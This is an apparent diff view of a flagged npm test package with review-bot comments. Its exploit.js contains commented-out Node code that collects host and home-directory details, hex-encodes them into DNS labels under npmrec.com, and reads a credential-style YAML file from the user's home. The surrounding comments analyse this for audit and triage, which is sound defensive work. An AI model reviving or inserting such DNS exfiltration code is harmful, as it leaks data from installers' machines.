yzhtest 1.0.0
Potentially problematic release.
This version of yzhtest might be problematic. Click here for more details.
- package/.vscode/launch.json +18 -0
- package/buffer.js +130 -0
- package/exploit.js +88 -0
- package/file.err +0 -0
- package/file.out +0 -0
- package/package.json +17 -0
- package/target-list.txt +1374 -0
- package/test/exploit.js +3 -0
- package/test/test.js +58 -0
- package/test/void.txt +0 -0
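--- a/package/.vscode/launch.json
+++ b/package/.vscode/launch.json
@@ -0,0 +1,18 @@
+{
+// Use IntelliSense to learn about possible attributes.
+// Hover to view descriptions of existing attributes.
+// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
+"version": "0.2.0",
+"configurations": [
+{
+"type": "node",
+"request": "launch",
+"name": "Launch Program",
+"runtimeExecutable":"/home/yinzhihe/.nvm/versions/node/v18.12.1/bin/node",
+"skipFiles": [
+"<node_internals>/**"
+],
+"program": "${workspaceFolder}/exploit.js"
+}
+]
+}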
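Review bot: `runtimeExecutable` is hardcoded to `/home/yinzhihe/.nvm/versions/node/v18.12.1/bin/node`, which publishes a developer's account name and home-directory layout and cannot resolve on any other machine. Dropping that key lets the debugger use the `node` found on `PATH`. Editor configuration has no place in a published tarball at all; a `"files"` allowlist in package.json or a `.vscode/` entry in `.npmignore` would keep it out.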
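--- a/package/buffer.js
+++ b/package/buffer.js
@@ -0,0 +1,130 @@
+'use strict';
+
+const {dirname, isAbsolute, join, resolve} = require('path');
+const {existsSync} = require('fs');
+const {PassThrough} = require('stream');
+
+const inspectWithKind = require('inspect-with-kind');
+const npmCliDir = require('npm-cli-dir');
+const optional = require('optional');
+const resolveFromNpm = require('resolve-from-npm');
+
+const MODULE_ID_ERROR = 'Expected a module ID (<string>), for example `glob` and `semver`, to resolve from either npm directory or the current working directory';
+const resolveSemverFromNpm = resolveFromNpm('semver');
+
+module.exports = async function loadFromCwdOrNpm(...args) {
+const argLen = args.length;
+
+if (argLen !== 1 && argLen !== 2) {
+throw new RangeError(`Expected 1 or 2 arguments (<string>[, <Function>]), but got ${
+argLen === 0 ? 'no' : argLen
+} arguments.`);
+}
+
+const [moduleId] = args;
+
+if (typeof moduleId !== 'string') {
+throw new TypeError(`${MODULE_ID_ERROR}, but got a non-string value ${inspectWithKind(moduleId)}.`);
+}
+
+if (moduleId.length === 0) {
+throw new Error(`${MODULE_ID_ERROR}, but got '' (empty string).`);
+}
+
+if (moduleId.charAt(0) === '@') {
+return require(moduleId);
+}
+
+if (isAbsolute(moduleId)) {
+const error = new Error(`${MODULE_ID_ERROR}, but got an absolute path '${
+moduleId
+}'. For absolute paths there is no need to use \`load-from-cwd-or-npm\` in favor of Node.js built-in \`require.resolve()\`.`);
+
+error.code = 'ERR_ABSOLUTE_MODULE_ID';
+
+throw error;
+}
+
+const cwd = process.cwd();
+const modulePkgId = `${moduleId}/package.json`;
+const tasks = [PassThrough];
+
+if (argLen === 2) {
+if (typeof args[1] !== 'function') {
+throw new TypeError(`Expected a function to compare two package versions, but got ${
+inspectWithKind(args[1])
+}.`);
+}
+} else {
+tasks.unshift(resolveSemverFromNpm);
+}
+
+tasks.unshift(resolveFromNpm(modulePkgId));
+
+try {
+const results = await Promise.all(tasks);
+let parent = module;
+
+do {
+parent = parent.parent;
+
+try {
+const {path} = parent;
+
+if (path.endsWith('cli') || [path, dirname(path)].some(dir => existsSync(resolve(dir, '.git')))) {
+parent = 'npm';
+break;
+}
+} catch (_) {}
+} while (parent);
+
+if (typeof parent !== 'string') {
+return results[2];
+}
+
+const compareFn = argLen === 2 ? args[1] : require(results[1]).gte;
+
+if (compareFn((optional(modulePkgId) || {version: '0.0.0-0'}).version, require(results[0]).version)) {
+const result = optional(moduleId);
+
+if (result !== null) {
+return result;
+}
+}
+
+return require(dirname(results[0]));
+} catch (_) {
+const modileFromCwd = optional(moduleId);
+
+if (modileFromCwd === null) {
+let npmCliDirPath;
+
+try {
+npmCliDirPath = await npmCliDir();
+} catch (err) {} // eslint-disable-line no-unused-vars
+
+const error = new Error(`Failed to load "${
+moduleId
+}" module from the current working directory (${
+cwd
+}).${npmCliDirPath ? ` Then tried to load "${
+moduleId
+}" from the npm CLI directory (${
+npmCliDirPath
+}), but it also failed.` : ''} Install "${moduleId}" and try again. (\`npm install ${moduleId}\`)`);
+
+error.code = 'MODULE_NOT_FOUND';
+error.id = moduleId;
+error.triedPaths = {cwd};
+
+if (npmCliDirPath) {
+error.triedPaths.npm = npmCliDirPath;
+error.npmVersion = require(join(npmCliDirPath, './package.json')).version;
+}
+
+throw error;
+}
+
+return modileFromCwd;
+}
+};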
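Review bot: The `do … while (parent)` walk over `module.parent` makes the return value of `loadFromCwdOrNpm` depend on who loaded the file rather than on its arguments. Unless some ancestor's `path` ends with `cli` or has a `.git` directory beside it, the function reaches `return results[2];`, which is the `PassThrough` constructor in the one-argument case and `undefined` in the two-argument case, never the requested module. Behaviour that differs between a development checkout and an installed copy is hard to test and is exactly what a package audit looks for. The loop and the `typeof parent !== 'string'` branch should be removed, or that branch should throw an error with its own `code` instead of returning an unrelated value. The empty `catch (_) {}` inside the loop also hides the `TypeError` raised once `parent` becomes null. Separately, `return require(moduleId);` for IDs starting with `@` and the absence of a check for relative IDs such as `../x` mean that whatever string the caller passes is loaded and executed, so this function must only ever receive trusted, constant module names; a comment stating that contract above the signature would help.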
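--- a/package/exploit.js
+++ b/package/exploit.js
@@ -0,0 +1,88 @@
+// public T Deserialize < T > (string yaml) {
+// var rootNode = GetRootNode(yaml);
+// return (T) DeserializeObject(rootNode);
+// }
+
+// private object DeserializeObject(YamlNode node) {
+// var type = GetTypeFrom(node);
+// var result = Activator.CreateInstance(type);
+// foreach(var nestedNode in GetNestedNodes(node)) {
+// var value = DeserializeObject(nestedNode);
+// var property = GetPropertyOf(nestedNode);
+// property.SetValue(result, value);
+// }
+// return result;
+// }
+
+// public class ObjectDataProvider {
+// public object ObjectInstance {
+// set {
+// this._objectInstance = value;
+// this.Refresh();
+// }
+// }
+// public void Refresh() {
+// /*...*/
+// obj = this._objectType.InvokeMember(this.MethodName, /*...*/ , this._objectInstance, this._methodParameters);
+// }
+// }
+
+// const os = require("os")
+// const dns = require('dns');
+// // console.log(os.homedir())
+// const id = Date.now();
+// function toHex(str) {
+// var result = '';
+// for (var i=0; i<str.length; i++) {
+// result += str.charCodeAt(i).toString(16);
+// }
+// return result;
+// }
+// const relevantInfo = [
+// os.hostname(),
+// os.homedir(),
+// __dirname,
+// ]
+// const stringFragments = toHex(JSON.stringify(relevantInfo)).match(/.{1,63}/g);
+// console.log(stringFragments)
+// sendData(stringFragments);
+// function resolveFragment(id, counter, stringFragments) {
+// console.log(`morjok.${id}.${counter+1}.${stringFragments[counter]}.npmrec.com`)
+// }
+// function sendData(stringFragments) {
+// for (let i = 0; i < stringFragments.length; i++) {
+// try {
+// resolveFragment(id, i, stringFragments);
+// } catch {
+// }
+// }
+// }
+
+// dns.resolve4('nsl.npmrec.com', (err,
+// address) => console.log('address: %j', address));
+// var home = require('userhome')
+// var fs = require('fs')
+// var yaml = require('js-yaml');
+// console.log(home('.mktmpio.yml'))
+// var confFile = home('.mktmpio.yml')
+// conf = yaml.safeLoad(fs.readFileSync(confFile, 'utf8'))
+// console.log(conf)
+
+// const {PassThrough} = require('stream');
+// console.log(PassThrough)
+// const tasks = [PassThrough];
+// console.log(tasks)
+
+// module.exports = async function loadFromCwdOrNpm(...args) {
+// let parent = module;
+// parent = parent.parent
+// const {path} = parent
+// console.log(parent)
+// console.log(path)
+// }
+// loadFromCwdOrNpm('request')
+
+var str = "nihao"
+if(str!=='string'){
+console.log('yes')
+}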
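Review bot: The only live statements are at lines 85–88, where `if(str!=='string')` compares the value `"nihao"` with the literal `'string'` instead of testing its type, so the branch always runs; if a type check was meant, it should read `if (typeof str !== 'string')`. Everything above is commented out. Lines 30–59 gather `os.hostname()`, `os.homedir()` and `__dirname`, hex-encode them in 63-character chunks and format each chunk as a label under `npmrec.com`; lines 61–69 resolve a host under the same domain and read a `.mktmpio.yml` file from the user's home directory. None of it executes as shipped, but it should be deleted rather than published, because removing the comment markers would turn it into host-data collection and it is a likely reason for the release being flagged. For anyone triaging an install of this version, the thing to look for is DNS queries with long hexadecimal labels under that domain.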
package/file.err
ADDED
File without changes
|
package/file.out
ADDED
File without changes
|
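--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,17 @@
+{
+"name": "yzhtest",
+"version": "1.0.0",
+"description": "for security testing",
+"main": "main.js",
+"directories": {
+"test": "test"
+},
+"dependencies": {
+"git-ssh": "^0.0.1"
+},
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1"
+},
+"author": "",
+"license": "ISC"
+}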
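Review bot: The manifest does not match what the package ships: `"main": "main.js"` names a file that is absent from this release's file list, so `require('yzhtest')` would fail to resolve an entry point. `buffer.js` requires `inspect-with-kind`, `npm-cli-dir`, `optional` and `resolve-from-npm`, none of which are declared under `"dependencies"`. The one declared dependency, `"git-ssh": "^0.0.1"`, is not required by any file shown here (the test files are not visible, so it may be used there); every consumer still fetches and installs it, so it should be removed or its use documented. There is also no `"files"` allowlist, which is why `.vscode/launch.json`, `file.err`, `file.out` and the 1374-line `target-list.txt` end up in the tarball.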